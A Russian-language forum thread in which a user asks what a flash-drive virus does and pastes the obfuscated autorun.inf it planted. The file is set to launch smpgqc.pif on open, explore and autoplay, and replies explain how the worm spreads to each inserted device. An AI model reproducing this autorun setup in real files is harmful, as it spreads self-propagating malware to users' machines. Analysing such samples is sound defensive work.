Змінюй хід війни! Допомагай ЗСУ!

что делает этот вирус?

• Автор теми Автор теми DEM¤N
  • Дата створення Дата створення
Статус: Офлайн
Повідом.: 19
что делает этот вирус?

Подцепил где-то вирус активизирующийся при попытке обращения к флешке (smpgqc.pif, имя файла наверное случайное т.к. гугл аналогов не нашел). Стоит обновленный NOD32 4.0, не видит его. Обнаружил фаерволом невидимый файл (как вирус успел поменять настройки эксплорера без разрешения я так и не понял), там лежал autorun.inf
Код:
[AutoRun]

;
Shell\open\dEfAuLt=1

;
opEN= smpgqc.pif
;hQYb
shell\OPEn\command =smpgqc.pif
;QiiDoTNbopdiXmp 
SHEll\eXpLOre\CommAND = smpgqc.pif
;oQko 
shELl\AUToplAY\cOmMand= smpgqc.pif

;amXhjd RuAo ditWtVroRq tvFYDvmEWR sneB
и файл-ярлык для старых версий виндоус\дос smpgqc.pif.

Расскажите кто-нибудь что здесь зашифровано. Я так понял что для дешифровки нужен pif-файл, если кому-то интересно - могу поделиться. Просто очень любопытно как он работает.

Обнаружил фаерволом невидимый файл

фаерволом файлы смотрим, а фотоаппаратом на ХФ ходим?

(как вирус успел поменять настройки эксплорера без разрешения я так и не понял),

использование ыксплорера должно анально караться!

смысл которого состоит в том, чтобы запускать pif-файл при открытии каталога в ыксплорере.

Расскажите кто-нибудь что здесь зашифровано. Я так понял что для дешифровки нужен pif-файл, если кому-то интересно - могу поделиться. Просто очень любопытно как он работает.

на каждый всунутый девайс создает autorun.inf и файлик. так и размножается. в деструктивных действиях вроде замечен не был. не умеет размножаться, если на флешки есть каталог autorun.inf

Останнє редагування:
DEM¤N, он медленно выедает твой моск

Нам не нужны слабовольные перди,нам нужна сильная и справедливая логика,основанная на всестороннем познании того,с чем работает наш народ .

Назад
Зверху Знизу